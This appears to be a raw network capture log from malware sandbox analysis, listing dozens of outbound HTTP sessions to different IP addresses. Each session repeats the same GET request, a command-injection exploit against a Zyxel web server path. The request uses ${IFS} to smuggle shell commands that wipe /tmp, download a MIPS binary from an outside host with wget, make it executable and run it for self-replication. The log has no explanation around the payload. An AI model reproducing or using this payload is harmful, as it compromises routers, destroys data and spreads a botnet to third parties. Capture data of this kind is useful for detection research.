                              Mar 31, 2024 08:42:06.331998110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8423192.168.2.1333330190.128.68.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.332043886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8424192.168.2.1337256170.161.89.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.332118034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8425192.168.2.1344872137.232.181.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.332139969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8426192.168.2.1337590176.36.149.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.332165003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8427192.168.2.1356050200.208.99.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.332228899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8428192.168.2.1334726126.237.78.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.332281113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8429192.168.2.1337314106.42.36.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.332334995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8430192.168.2.1338332146.3.176.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.332365990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8431192.168.2.135413043.174.25.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.332425117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8432192.168.2.135060057.143.140.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.332458973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8433192.168.2.133390614.35.84.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.332509041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8434192.168.2.1336124182.58.31.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.332556963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8435192.168.2.13394265.40.153.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.332607031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8436192.168.2.1336588172.237.138.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.332658052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8437192.168.2.1338980110.147.92.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.332705021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8438192.168.2.135616079.74.174.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.332757950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8439192.168.2.1356276148.206.81.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.332807064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8440192.168.2.135632492.101.205.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.332861900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8441192.168.2.1349310170.239.103.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.332907915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8442192.168.2.1341780107.141.4.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.332937002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8443192.168.2.135153260.220.157.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.332979918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8444192.168.2.134898892.241.157.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.333029032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8445192.168.2.1350108107.47.151.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.333080053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8446192.168.2.134011466.8.183.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.333139896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8447192.168.2.1360926105.203.85.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.333185911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8448192.168.2.134645087.106.141.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.333230019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8449192.168.2.1358742162.114.201.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.333268881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8450192.168.2.1357732199.148.114.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.333326101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8451192.168.2.1337430179.150.117.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.333369017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8452192.168.2.1333378201.168.209.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.333417892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8453192.168.2.1341540172.114.199.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.333450079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8454192.168.2.134648052.249.232.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.333515882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8455192.168.2.135037491.194.85.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.333537102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8456192.168.2.1350804146.29.255.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.333610058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8457192.168.2.1353064102.128.232.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.333630085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8458192.168.2.134352640.9.110.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.333662987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8459192.168.2.133281488.144.15.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.333712101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8460192.168.2.1338484198.66.167.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.333765984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8461192.168.2.133284878.137.25.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.333796978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8462192.168.2.136060031.174.112.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.333831072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8463192.168.2.1337880135.94.190.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.333905935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8464192.168.2.1342568176.81.246.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.333949089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8465192.168.2.1334340142.12.241.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.333991051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8466192.168.2.1335206134.30.251.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.334043980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8467192.168.2.1357508207.14.191.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.334090948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8468192.168.2.1345098223.112.192.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.334129095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8469192.168.2.1360194167.210.185.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.334178925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8470192.168.2.1360536173.104.167.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.334207058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8471192.168.2.135817873.143.57.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.334254026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8472192.168.2.134655619.157.104.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.334285021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8473192.168.2.1335064101.152.221.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.334352016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8474192.168.2.133513077.21.192.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.334407091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8475192.168.2.1345096108.136.69.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.334435940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8476192.168.2.135445073.150.44.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.334491014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8477192.168.2.135851218.184.141.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.334537029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8478192.168.2.134581040.125.170.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.334572077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8479192.168.2.13477945.140.141.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.334615946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8480192.168.2.135877262.101.214.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.334665060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8481192.168.2.135341625.99.107.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.334718943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8482192.168.2.1347982186.207.64.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.334758043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8483192.168.2.13474624.58.50.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.334810972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8484192.168.2.1351634120.225.34.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.334841967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8485192.168.2.1337696223.110.0.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.334881067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8486192.168.2.133455662.237.68.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.334929943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8487192.168.2.1341638138.107.185.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.334970951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8488192.168.2.1343518197.34.237.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.335032940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8489192.168.2.135381685.195.99.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.335083961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8490192.168.2.1356044199.124.82.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.335128069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8491192.168.2.1357966197.214.157.144443
                              TimestampBytes transferredDirectionData
